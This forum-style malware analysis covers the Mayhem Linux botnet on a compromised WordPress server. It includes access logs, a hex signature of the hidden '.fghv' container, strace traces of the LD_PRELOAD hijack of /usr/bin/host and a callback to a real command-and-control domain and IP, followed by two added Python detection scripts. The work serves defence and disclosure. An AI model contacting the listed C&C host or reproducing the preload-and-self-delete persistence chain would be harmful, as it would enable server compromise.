This is the Mayhem incident of July 30th. The attacker was detected installing the installer, as per the log snippet below:
```
178-137-18-246-lvv.broadband.kyivstar.net - - [28/Jul/2014:01:16:02 +0900] "GET /wp-content/themes/XXXX/styleimg.php HTTP/1.1" 200 85 "-" "Python-urllib/2.7" "-"
```
You can see the installer in the attached file (with the binary stripped, sorry).
This installer will create the encrypted drive ".fghv". This drive has typical sigs in the first sector, as follows:
```
0000 23 74 FA 49 37 F6 DF D0 17 72 08 E1 B1 73 B3 1D #t.I7....r...s..
0010 B4 D9 54 45 38 5A A9 AB 5D E8 BE 47 30 99 69 EE ..TE8Z..]..G0.i.
0020 FD FB 8F DB 18 46 E9 31 72 9B 45 0D 03 ED 2E FB .....F.1r.E.....
0030 BF 0E FB B6 80 F6 40 70 2E 55 57 96 EB EF AC E6 ......@p.UW.....
0040 D8 D4 E9 DE D9 1E 13 F7 D8 D4 E9 DE D9 1E 13 F7 ................
```
Note: I think one can apply this sig to Yara or an AV scanner to check whether the server is infected.
The tools at the links below can be used to read this drive:
http://ultra-embedded.com/fat_filelib
https://github.com/freeoks/SD0_reader
The drive was mounted in every Mayhem infection with the read/write flag; in memory it is seen as:
```
host 15448 mmd mem REG RW 9,2 12582912 29763122 /home/mmd/0x02E/007/.fghv
```
Inside it you will see the files used for the attack, as announced by the Yandex team here:
https://www.virusbtn.com/virusbulletin/ ... -fig11.jpg
In this post I will (generally) debug the installer, with some comments.
The point of this information is to form the mitigation for the threat installation.
1. Since the nature of the installation needs the LD_PRELOAD interception of the NIX API called /usr/bin/host, you will see that every Mayhem infection is loading these modules (i.e. in x64):
```
/lib/x86_64-linux-gnu/libnss_dns-2.13.so
/lib/x86_64-linux-gnu/libnss_files-2.13.so
/usr/lib/x86_64-linux-gnu/openssl-1.0.0/engines/libgost.so
/lib/x86_64-linux-gnu/libm-2.13.so
/lib/x86_64-linux-gnu/liblzma.so.5.0.0
/lib/x86_64-linux-gnu/libattr.so.1.1.0
/usr/lib/libisccc.so.80.0.2
/lib/x86_64-linux-gnu/libz.so.1.2.7
/lib/x86_64-linux-gnu/libresolv-2.13.so
/lib/x86_64-linux-gnu/libkeyutils.so.1.4
/usr/lib/x86_64-linux-gnu/libkrb5support.so.0.1
/lib/x86_64-linux-gnu/libcom_err.so.2.1
/usr/lib/x86_64-linux-gnu/libk5crypto.so.3.1
/usr/lib/x86_64-linux-gnu/libkrb5.so.3.3
/usr/lib/libGeoIP.so.1.4.8
/lib/x86_64-linux-gnu/libc-2.13.so
/usr/lib/x86_64-linux-gnu/libxml2.so.2.8.0
/lib/x86_64-linux-gnu/libpthread-2.13.so
/lib/x86_64-linux-gnu/libcap.so.2.22
/lib/x86_64-linux-gnu/libdl-2.13.so
/usr/lib/libisc.so.84.1.0
/usr/lib/libisccfg.so.82.0.3
/usr/lib/libbind9.so.80.0.7
/usr/lib/x86_64-linux-gnu/libcrypto.so.1.0.0
/usr/lib/x86_64-linux-gnu/libgssapi_krb5.so.2.2
/usr/lib/libdns.so.88.1.1
/usr/lib/liblwres.so.80.0.3
/home/mmd/0x02E/007/libworker.so
/lib/x86_64-linux-gnu/ld-2.13.so
```
libworker.so is the malware, libnss is used to resolve DNS, and some modules are specifically used by the malware itself (self-explanatory, i.e. the crypto and GeoIP ones).
2. Mayhem installer process:
(malware installer blah.so started with initial PID)
// process self-detached execution after /usr/bin/hosts was executed:
```
execve("/home/mmd/0x02E/007/1.20322", ["/home/mmd/0x02E/007/1.20322"], [/* 20 vars */]) = 0
```
// local addr INET
```
socket(PF_INET, SOCK_DGRAM, IPPROTO_IP) = 6
connect(6, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("DNS SETTING")}, 16) = 0
getsockname(6, {sa_family=AF_INET, sin_port=htons(47377), sin_addr=inet_addr("YOUR_IP")}, [16]) = 0
```
// uname executed by shell escape:
```
execve("/bin/sh", ["sh", "-c", "/bin/uname -a"], [/* 19 vars */]) = 0
write(1, "Linux 1x111 3.2.0-4-amd64 #1 SMP"..., 73 <unfinished ...>
```
// read the ELF after reforked beforehand..
```
read(8, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\0\360\1\0\0\0\0\0"..., 832) = 832
fstat(8, {st_mode=S_IFREG|0755, st_size=1599536, ...}) = 0
```
// self deletion..creating the encrypted drive:
```
unlink("/home/mmd/0x02E/007/libworker.so") = 0
open(".fghv", O_RDWR) = 8
```
// reforked, attempt to access "/" (server's root), self closing +open /dev/null..
```
clone(Process xxx attached
umask(0) = 022
setsid() = 20333
chroot("/") = -1 EPERM (Operation not permitted)
:
close(0) = 0
close(1) = 0
:
close(1021) = -1 EBADF (Bad file descriptor)
close(1022) = -1 EBADF (Bad file descriptor)
:
open("/dev/null", O_RDONLY) = 2
open("/dev/null", O_RDONLY) = 3
```
// preparing sending DNS request..
```
open("/etc/resolv.conf", O_RDONLY) = 4
uname({sys="Linux", node="1x111", ...}) = 0
connect(4, {sa_family=AF_FILE, path="/var/run/nscd/socket"}, 110) = -1 ENOENT (No such file or directory)
open("/etc/nsswitch.conf", O_RDONLY) = 4
read(4, "# /etc/nsswitch.conf\n#\n# Example"..., 4096) = 475
open("/etc/ld.so.cache", O_RDONLY) = 4
open("/lib/x86_64-linux-gnu/libnss_files.so.2", O_RDONLY) = 4
open("/lib/x86_64-linux-gnu/libnss_dns.so.2", O_RDONLY) = 4
```
// querying IP address for the CNC..
```
socket(PF_INET, SOCK_DGRAM|SOCK_NONBLOCK, IPPROTO_IP) = 4
connect(4, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("8.8.8.8")}, 16) = 0
poll([{fd=4, events=POLLOUT}], 1, 0) = 1 ([{fd=4, revents=POLLOUT}])
sendto(4, "\242U\1\0\0\1\0\0\0\0\0\0\vimbosatelit\3biz\0\0\1\0"..., 33, MSG_NOSIGNAL, NULL, 0) = 33
recvfrom(4, "\242U\201\200\0\1\0\1\0\0\0\0\vimbosatelit\3biz\0\0\1\0"..., 1024, 0, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("8.8.8.8")}, [16]) = 49
```
// callback sent:
```
socket(PF_INET, SOCK_STREAM, IPPROTO_TCP) = 4
connect(4, {sa_family=AF_INET, sin_port=htons(80), sin_addr=inet_addr("62.75.179.242")}, 16) = 0
write(4, "POST /go.php HTTP/1.0\r\nHost: imb"..., 173) = 173
read(4, "HTTP/1.1 404 Not Found\r\nServer: "..., 32768) = 367
read(4, "", 32768) = 0
```
This CNC is in Germany, on an abused host. I wrote this for LE follow-up, as the verdict:
```
$ echo 62.75.179.242 |bash origin.sh
62.75.179.242|static-ip-62-75-179-242.inaddr.ip-pool.com.|8972 | 62.75.128.0/17 | PLUSSERVER | DE | INTERGENIA.DE | INTERGENIA AG
```
3. Samples for this incident are attached with the PCAP. (members only)
In VT, the x32 installer ELF:
https://www.virustotal.com/en/file/4275 ... 406866832/
x64 installer ELF:
https://www.virustotal.com/en/file/dce6 ... 406866857/
If you work at an AV entity and are supporting Linux/FreeBSD OS in your marketing pamphlets, please help to raise the detection ratio of this threat by registering the shared sample. This threat is no joke, it aims at all of WordPress and Joomla to be a huge CHAOS botnet..
#MalwareMustDie!
+) basic knowledge of the threat:
http://blog.malwaremustdie.org/2014/05/ ... lware.html
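
Added example, not part of the original post: a filesystem scanner built on the note above that the first-sector bytes of ".fghv" could serve as a signature. It assumes those bytes are the same across infections, as the post suggests; the function names `classify` and `scan` are hypothetical.

```python
import os
import sys

# First-sector bytes of the ".fghv" container, copied from the hex dump in the post.
# Assumption: the header is identical on every infected host.
FGHV_HEADER = bytes.fromhex(
    "2374FA4937F6DFD0177208E1B173B31D"
    "B4D95445385AA9AB5DE8BE47309969EE"
    "FDFB8FDB1846E931729B450D03ED2EFB"
    "BF0EFBB680F640702E555796EBEFACE6"
    "D8D4E9DED91E13F7D8D4E9DED91E13F7"
)
CONTAINER_NAME = ".fghv"  # file name created by the installer, per the post


def classify(path):
    """Return 'header' on a byte match, 'name' on a name-only match, else None."""
    try:
        with open(path, "rb") as fh:
            head = fh.read(len(FGHV_HEADER))
    except OSError:
        head = b""  # unreadable file: fall back to the name check
    if head == FGHV_HEADER:
        return "header"  # strongest hit, survives a rename of the container
    if os.path.basename(path) == CONTAINER_NAME:
        return "name"    # weaker hit, worth a manual look
    return None


def scan(root):
    """Walk a web root and return sorted (path, verdict) pairs for every hit."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            if os.path.islink(full) or not os.path.isfile(full):
                continue  # skip symlinks, sockets and device nodes
            verdict = classify(full)
            if verdict:
                hits.append((full, verdict))
    return sorted(hits)


if __name__ == "__main__":
    for path, verdict in scan(sys.argv[1] if len(sys.argv) > 1 else "."):
        print(f"{verdict}\t{path}")
```
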
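
Added example, not part of the original post: a check over `lsof` output for the condition described in item 1 and in the lsof line above, a `host` process mapping files from outside the system library directories. Only the first sample row comes from the post; the other rows, the prefix list and the function names are constructed for illustration.

```python
# lsof(8) on Linux lists mapped files with FD "mem" and deleted mappings with FD "DEL".
MAPPED_FDS = {"mem", "DEL"}
# Assumed locations a stock /usr/bin/host maps its binary and libraries from.
SYSTEM_PREFIXES = ("/lib/", "/lib64/", "/usr/lib/", "/usr/lib64/", "/usr/bin/")

# Constructed sample: row 1 is the lsof line quoted in the post, the rest are made up.
SAMPLE_LSOF = """\
host 15448 mmd mem REG RW 9,2 12582912 29763122 /home/mmd/0x02E/007/.fghv
host 15448 mmd mem REG 9,2 1599536 29763100 /lib/x86_64-linux-gnu/libc-2.13.so
host 15448 mmd DEL REG 9,2 29763101 /home/mmd/0x02E/007/libworker.so
host 900 root mem REG 9,2 100000 111 /usr/lib/libdns.so.88.1.1
sshd 700 root mem REG 9,2 100000 112 /home/x/odd.so
"""


def parse_row(line):
    """Return (command, pid, fd, path) for a mapped-file row, else None."""
    tokens = line.split()
    if len(tokens) < 5 or not tokens[1].isdigit() or tokens[3] not in MAPPED_FDS:
        return None
    # NAME is the last column; it starts at the first token that looks like a path.
    for i in range(4, len(tokens)):
        if tokens[i].startswith("/"):
            return tokens[0], int(tokens[1]), tokens[3], " ".join(tokens[i:])
    return None


def suspicious_host_maps(lsof_text, command="host"):
    """Flag mappings of `command` that are hidden or outside system paths."""
    findings = []
    for line in lsof_text.splitlines():
        row = parse_row(line)
        if row is None or row[0] != command:
            continue
        _cmd, pid, fd, path = row
        reasons = []
        if not path.startswith(SYSTEM_PREFIXES):
            reasons.append("outside system library paths")
        if path.rsplit("/", 1)[-1].startswith("."):
            reasons.append("hidden file")
        if not reasons:
            continue  # a system library, even if replaced by an upgrade, is not flagged
        if fd == "DEL":
            reasons.append("deleted after mapping")
        findings.append((pid, path, reasons))
    return findings


if __name__ == "__main__":
    for pid, path, reasons in suspicious_host_maps(SAMPLE_LSOF):
        print(f"pid {pid}: {path} ({', '.join(reasons)})")
```
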